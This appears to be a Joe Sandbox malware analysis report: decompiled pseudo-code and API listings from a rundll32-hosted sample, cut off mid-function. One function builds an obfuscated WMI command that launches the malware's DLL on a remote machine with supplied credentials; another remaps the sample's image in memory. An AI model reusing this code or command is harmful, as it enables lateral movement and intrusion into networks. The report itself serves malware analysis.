                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B641A(char* _a4) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				short* _v12;
                                                                                                                                                                                        				int _t7;
                                                                                                                                                                                        				short* _t11;
                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                        				short* _t13;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
                                                                                                                                                                                        				_v8 = _t7;
                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
                                                                                                                                                                                        				_v12 = _t11;
                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
                                                                                                                                                                                        				_t13 = _v12;
                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t13;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B644D
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1432973188-3175316637
                                                                                                                                                                                        • Opcode ID: e7fbd98854de30a9775b60c1fca34f839693ed70fc5de0edf760e055b38a326d
                                                                                                                                                                                        • Instruction ID: 05f33e6501948140b751fc614037884de0bc106b2195b42db275f81683aadaee
                                                                                                                                                                                        • Opcode Fuzzy Hash: e7fbd98854de30a9775b60c1fca34f839693ed70fc5de0edf760e055b38a326d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 25F096B6A0411DBFEB006FA89DC4DBF7ABCEB453647104235FA11E2190D1388D005770
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6CED(signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				signed int* _t11;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                                                        				if(_t11 != 0) {
                                                                                                                                                                                        					 *_t11 =  *_t11 & 0x00000000;
                                                                                                                                                                                        					_t11[1] = _a4;
                                                                                                                                                                                        					if(E007B6D35(_t11, _t13, _a8) == 0) {
                                                                                                                                                                                        						_t11 = 0;
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0, 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t11;
                                                                                                                                                                                        			}






                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFC
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFF
                                                                                                                                                                                          • Part of subcall function 007B6D35: EnterCriticalSection.KERNEL32(?,74654F20,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D46
                                                                                                                                                                                          • Part of subcall function 007B6D35: LeaveCriticalSection.KERNEL32(?,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D7F
                                                                                                                                                                                          • Part of subcall function 007B6D35: Sleep.KERNEL32(00002710,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D97
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D24
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D27
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 2739146912-1689521831
                                                                                                                                                                                        • Opcode ID: 34ec549b51880aecea8228a0672c24ea3b9a9d68cde67fa9a1e0187f209dad1f
                                                                                                                                                                                        • Instruction ID: 03d6d317ce78aee7f59dd7dd35f998b0c16369a7233717a1248d0354894cf543
                                                                                                                                                                                        • Opcode Fuzzy Hash: 34ec549b51880aecea8228a0672c24ea3b9a9d68cde67fa9a1e0187f209dad1f
                                                                                                                                                                                        • Instruction Fuzzy Hash: BAE03972300349ABEB206FE99C89F97BB9DFB94314F008025FA008A110DABCD8088A20
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                        			E007B9972(WCHAR* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                        				short _v8;
                                                                                                                                                                                        				short _v10;
                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                        				short _v14;
                                                                                                                                                                                        				short _v16;
                                                                                                                                                                                        				short _v18;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				short _v22;
                                                                                                                                                                                        				short _v24;
                                                                                                                                                                                        				short _v26;
                                                                                                                                                                                        				short _v28;
                                                                                                                                                                                        				short _v30;
                                                                                                                                                                                        				short _v32;
                                                                                                                                                                                        				short _v34;
                                                                                                                                                                                        				short _v36;
                                                                                                                                                                                        				short _v38;
                                                                                                                                                                                        				short _v40;
                                                                                                                                                                                        				short _v42;
                                                                                                                                                                                        				short _v44;
                                                                                                                                                                                        				short _v46;
                                                                                                                                                                                        				short _v48;
                                                                                                                                                                                        				short _v50;
                                                                                                                                                                                        				short _v52;
                                                                                                                                                                                        				short _v54;
                                                                                                                                                                                        				short _v56;
                                                                                                                                                                                        				short _v58;
                                                                                                                                                                                        				short _v60;
                                                                                                                                                                                        				short _v62;
                                                                                                                                                                                        				short _v64;
                                                                                                                                                                                        				short _v66;
                                                                                                                                                                                        				short _v68;
                                                                                                                                                                                        				short _v70;
                                                                                                                                                                                        				short _v72;
                                                                                                                                                                                        				short _v74;
                                                                                                                                                                                        				short _v76;
                                                                                                                                                                                        				short _v78;
                                                                                                                                                                                        				short _v80;
                                                                                                                                                                                        				short _v82;
                                                                                                                                                                                        				short _v84;
                                                                                                                                                                                        				short _v86;
                                                                                                                                                                                        				short _v88;
                                                                                                                                                                                        				short _v608;
                                                                                                                                                                                        				char _v1128;
                                                                                                                                                                                        				char _v17512;
                                                                                                                                                                                        				short _t72;
                                                                                                                                                                                        				short _t73;
                                                                                                                                                                                        				short _t74;
                                                                                                                                                                                        				short _t75;
                                                                                                                                                                                        				short _t76;
                                                                                                                                                                                        				short _t77;
                                                                                                                                                                                        				short _t79;
                                                                                                                                                                                        				short _t81;
                                                                                                                                                                                        				short _t82;
                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                        				short _t91;
                                                                                                                                                                                        				WCHAR* _t96;
                                                                                                                                                                                        				short _t97;
                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                        				void _t99;
                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                        				signed short* _t104;
                                                                                                                                                                                        				short _t107;
                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                        				short _t109;
                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                        				short _t120;
                                                                                                                                                                                        				short _t121;
                                                                                                                                                                                        				short _t123;
                                                                                                                                                                                        				short _t124;
                                                                                                                                                                                        				short _t125;
                                                                                                                                                                                        				short _t127;
                                                                                                                                                                                        				short _t131;
                                                                                                                                                                                        				short _t132;
                                                                                                                                                                                        				short _t133;
                                                                                                                                                                                        				short _t134;
                                                                                                                                                                                        				short _t135;
                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                        				short _t138;
                                                                                                                                                                                        				short _t139;
                                                                                                                                                                                        				short _t140;
                                                                                                                                                                                        				short _t142;
                                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t96 = __ebx;
                                                                                                                                                                                        				E007BA760(0x4464);
                                                                                                                                                                                        				 *__ebx = 0;
                                                                                                                                                                                        				E007B88D3( &_v1128);
                                                                                                                                                                                        				_t72 = 0x2f;
                                                                                                                                                                                        				_v88 = _t72;
                                                                                                                                                                                        				_t73 = 0x6e;
                                                                                                                                                                                        				_v86 = _t73;
                                                                                                                                                                                        				_t74 = 0x6f;
                                                                                                                                                                                        				_v84 = _t74;
                                                                                                                                                                                        				_t75 = 0x64;
                                                                                                                                                                                        				_v82 = _t75;
                                                                                                                                                                                        				_t76 = 0x65;
                                                                                                                                                                                        				_v80 = _t76;
                                                                                                                                                                                        				_t77 = 0x3a;
                                                                                                                                                                                        				_t97 = 0x22;
                                                                                                                                                                                        				_v78 = _t77;
                                                                                                                                                                                        				_v76 = _t97;
                                                                                                                                                                                        				_t79 = 0x25;
                                                                                                                                                                                        				_t107 = 0x77;
                                                                                                                                                                                        				_v74 = _t79;
                                                                                                                                                                                        				_v72 = _t107;
                                                                                                                                                                                        				_t81 = 0x73;
                                                                                                                                                                                        				_v70 = _t81;
                                                                                                                                                                                        				_v68 = _t97;
                                                                                                                                                                                        				_t119 = 0x20;
                                                                                                                                                                                        				_v66 = _t119;
                                                                                                                                                                                        				_t120 = 0x2f;
                                                                                                                                                                                        				_v64 = _t120;
                                                                                                                                                                                        				_t121 = 0x75;
                                                                                                                                                                                        				_v62 = _t121;
                                                                                                                                                                                        				_v60 = _t81;
                                                                                                                                                                                        				_t123 = 0x65;
                                                                                                                                                                                        				_v58 = _t123;
                                                                                                                                                                                        				_t124 = 0x72;
                                                                                                                                                                                        				_v56 = _t124;
                                                                                                                                                                                        				_t125 = 0x3a;
                                                                                                                                                                                        				_v54 = _t125;
                                                                                                                                                                                        				_v52 = _t97;
                                                                                                                                                                                        				_t127 = 0x25;
                                                                                                                                                                                        				_v50 = _t127;
                                                                                                                                                                                        				_v48 = _t107;
                                                                                                                                                                                        				_v46 = _t81;
                                                                                                                                                                                        				_v44 = _t97;
                                                                                                                                                                                        				_t131 = 0x20;
                                                                                                                                                                                        				_v42 = _t131;
                                                                                                                                                                                        				_t132 = 0x2f;
                                                                                                                                                                                        				_v40 = _t132;
                                                                                                                                                                                        				_t133 = 0x70;
                                                                                                                                                                                        				_v38 = _t133;
                                                                                                                                                                                        				_t134 = 0x61;
                                                                                                                                                                                        				_v36 = _t134;
                                                                                                                                                                                        				_t135 = _t81;
                                                                                                                                                                                        				_v34 = _t135;
                                                                                                                                                                                        				_v32 = _t135;
                                                                                                                                                                                        				_v30 = _t107;
                                                                                                                                                                                        				_t137 = 0x6f;
                                                                                                                                                                                        				_v28 = _t137;
                                                                                                                                                                                        				_t138 = 0x72;
                                                                                                                                                                                        				_v26 = _t138;
                                                                                                                                                                                        				_t139 = 0x64;
                                                                                                                                                                                        				_v24 = _t139;
                                                                                                                                                                                        				_t140 = 0x3a;
                                                                                                                                                                                        				_v22 = _t140;
                                                                                                                                                                                        				_v20 = _t97;
                                                                                                                                                                                        				_t142 = 0x25;
                                                                                                                                                                                        				_v14 = _t81;
                                                                                                                                                                                        				_t82 = 0x20;
                                                                                                                                                                                        				_v10 = _t82;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_v18 = _t142;
                                                                                                                                                                                        				_v16 = _t107;
                                                                                                                                                                                        				_v12 = _t97;
                                                                                                                                                                                        				_a12 = wsprintfW(__ebx,  &_v88, _a4, _a8, _a12);
                                                                                                                                                                                        				_t98 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t48 = _t98 + L"process call create \"C:\\Windows\\System32\\rundll32.exe"; // 0x720070
                                                                                                                                                                                        					_t108 =  *_t48 & 0x0000ffff;
                                                                                                                                                                                        					 *(_t146 + _t98 - 0x25c) = _t108;
                                                                                                                                                                                        					_t98 = _t98 + 2;
                                                                                                                                                                                        				} while (_t108 != 0);
                                                                                                                                                                                        				_t112 =  &_v608 - 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t99 =  *(_t112 + 2);
                                                                                                                                                                                        					_t112 = _t112 + 2;
                                                                                                                                                                                        				} while (_t99 != 0);
                                                                                                                                                                                        				_t100 = 0xb;
                                                                                                                                                                                        				_t86 = memcpy(_t112, L" \\\"C:\\Windows\\%s\\\" #1 ", _t100 << 2);
                                                                                                                                                                                        				asm("movsw");
                                                                                                                                                                                        				_t145 = _a12 + wsprintfW( &(__ebx[_t86]),  &_v608,  &_v1128);
                                                                                                                                                                                        				E007B6735( &_v17512, 0x1fff);
                                                                                                                                                                                        				_t104 =  &_v17512;
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t91 =  *_t104 & 0x0000ffff;
                                                                                                                                                                                        					if(_t91 == 0x22) {
                                                                                                                                                                                        						_t109 = 0x5c;
                                                                                                                                                                                        						_t96[_t145] = _t109;
                                                                                                                                                                                        						_t145 = _t145 + 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t96[_t145] = _t91;
                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t104 =  &(_t104[1]);
                                                                                                                                                                                        					_t145 = _t145 + 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				wsprintfW( &(_t96[_t145]), "\"");
                                                                                                                                                                                        				return 1;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9AAF
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9B0D
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9B56
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: wsprintf$FileFindNamePath
                                                                                                                                                                                        • String ID: \"C:\Windows\%s\" #1
                                                                                                                                                                                        • API String ID: 988121887-1875761687
                                                                                                                                                                                        • Opcode ID: 422b2f636fc971e008645dca3a3146cd2aa7ecec983329626cdeda5acd83db86
                                                                                                                                                                                        • Instruction ID: d2db18a2a848996df5b6e0cd1f0b2b2fa97ce8ca6ab1d1a7bd88016ae96d786f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 422b2f636fc971e008645dca3a3146cd2aa7ecec983329626cdeda5acd83db86
                                                                                                                                                                                        • Instruction Fuzzy Hash: DF517523E24358A5DB20DBD4EC05BEFB774FF447A0F14606AE604AB2A0F6B54940C79A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E007B6F7C(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                                        					 *_t7(_a4,  &_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007B6F95
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                        • API String ID: 1646373207-3024904723
                                                                                                                                                                                        • Opcode ID: 8fb74b0bb47c7dca8351dafc92369b4d23a5e38fd35639806c2b1f85a16ef0b3
                                                                                                                                                                                        • Instruction ID: 6a2f1789bcc930528b0fa35cb2e0c7d3251fcebce9545c308b95921eb43bab32
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fb74b0bb47c7dca8351dafc92369b4d23a5e38fd35639806c2b1f85a16ef0b3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 83D012B560020DBBDB20DB94ED0AF9D7778EB55749F50811CB506D1090D7BCDF119B24
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                        			E007B923F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				if( *0x7c7b8c != 0) {
                                                                                                                                                                                        					L15:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t52 =  *0x7c3984; // 0x444ff8
                                                                                                                                                                                        				if(_t52 == 0) {
                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t14 =  *0x7c7b98;
                                                                                                                                                                                        				_t44 =  *( *((intOrPtr*)(_t14 + 0x3c)) + _t14 + 0x50);
                                                                                                                                                                                        				_t40 = _t14;
                                                                                                                                                                                        				_v8 = _t44;
                                                                                                                                                                                        				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
                                                                                                                                                                                        				if(_t31 == 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *0x7c7bb4 = _t31;
                                                                                                                                                                                        				memcpy(_t31, _t40, _t44);
                                                                                                                                                                                        				_t42 =  *0x7c3984; // 0x444ff8
                                                                                                                                                                                        				_t47 =  *((intOrPtr*)(_t42 + 0x3c)) + _t42;
                                                                                                                                                                                        				if(_t47 != 0) {
                                                                                                                                                                                        					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
                                                                                                                                                                                        					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
                                                                                                                                                                                        						_t22 = E007B8FD1(_t47, _t21);
                                                                                                                                                                                        						_t23 = _t22 + _t42;
                                                                                                                                                                                        						if(_t22 + _t42 != 0 && E007B8EA9(_t23, _t31) != 0 && E007B8F35(_t47, _t31) != 0) {
                                                                                                                                                                                        							_push(0xffffffff);
                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                                        							_push(_a4);
                                                                                                                                                                                        							 *((intOrPtr*)(E007B9154 -  *0x7c7b98 + _t31))();
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t48 = _v8;
                                                                                                                                                                                        				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t35 = _t48;
                                                                                                                                                                                        				_t19 = _t31;
                                                                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					VirtualFree(_t31, _t48, 0x4000);
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                        					_t19 = _t19 + 1;
                                                                                                                                                                                        					_t35 = _t35 - 1;
                                                                                                                                                                                        				} while (_t35 != 0);
                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                        			}

















                                                                                                                                                                                        0x007b930b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b930d
                                                                                                                                                                                        0x007b930f
                                                                                                                                                                                        0x007b9313
                                                                                                                                                                                        0x007b931c
                                                                                                                                                                                        0x007b9323
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9315
                                                                                                                                                                                        0x007b9315
                                                                                                                                                                                        0x007b9315
                                                                                                                                                                                        0x007b9318
                                                                                                                                                                                        0x007b9319
                                                                                                                                                                                        0x007b9319
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,007B79FC,?,?,?), ref: 007B927B
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B9294
                                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 007B9303
                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00004000), ref: 007B9323
                                                                                                                                                                                          • Part of subcall function 007B8F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 007B8F52
                                                                                                                                                                                          • Part of subcall function 007B8F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,00444FF8), ref: 007B8FB0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Virtual$Protect$AllocFreememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2644210-0
                                                                                                                                                                                        • Opcode ID: fc7d4f196edf41ee2a1c6ecb60fec1cbbe68eec368dadaa69ff49d4c5ed51e33
                                                                                                                                                                                        • Instruction ID: 649cb0f568ce265da938b1c01bd80402f26fd4eba464f31841f01edd41cd4fc9
                                                                                                                                                                                        • Opcode Fuzzy Hash: fc7d4f196edf41ee2a1c6ecb60fec1cbbe68eec368dadaa69ff49d4c5ed51e33
                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21B6B1600216BBDB249F699C48FEBB7ACBF44755F08412CBB25E7291EA78DD00C764
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007BBECB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                        				int _t41;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                        				int _t60;
                                                                                                                                                                                        				int _t62;
                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t57 = _a4;
                                                                                                                                                                                        				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                                                                                                        				if( *(_t64 + 0x34) != 0) {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					if( *(_t64 + 0x28) == 0) {
                                                                                                                                                                                        						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                                                                                                        						 *(_t64 + 0x30) = 0;
                                                                                                                                                                                        						 *(_t64 + 0x2c) = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t60 =  *(_t64 + 0x28);
                                                                                                                                                                                        					_t52 = _a12;
                                                                                                                                                                                        					_t34 = _a8;
                                                                                                                                                                                        					if(_t52 < _t60) {
                                                                                                                                                                                        						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                                                                                                        						_t53 = _t52 - _t62;
                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                        							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                                                                                                        							_t54 =  *(_t64 + 0x28);
                                                                                                                                                                                        							if( *(_t64 + 0x30) == _t54) {
                                                                                                                                                                                        								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                                                        							}
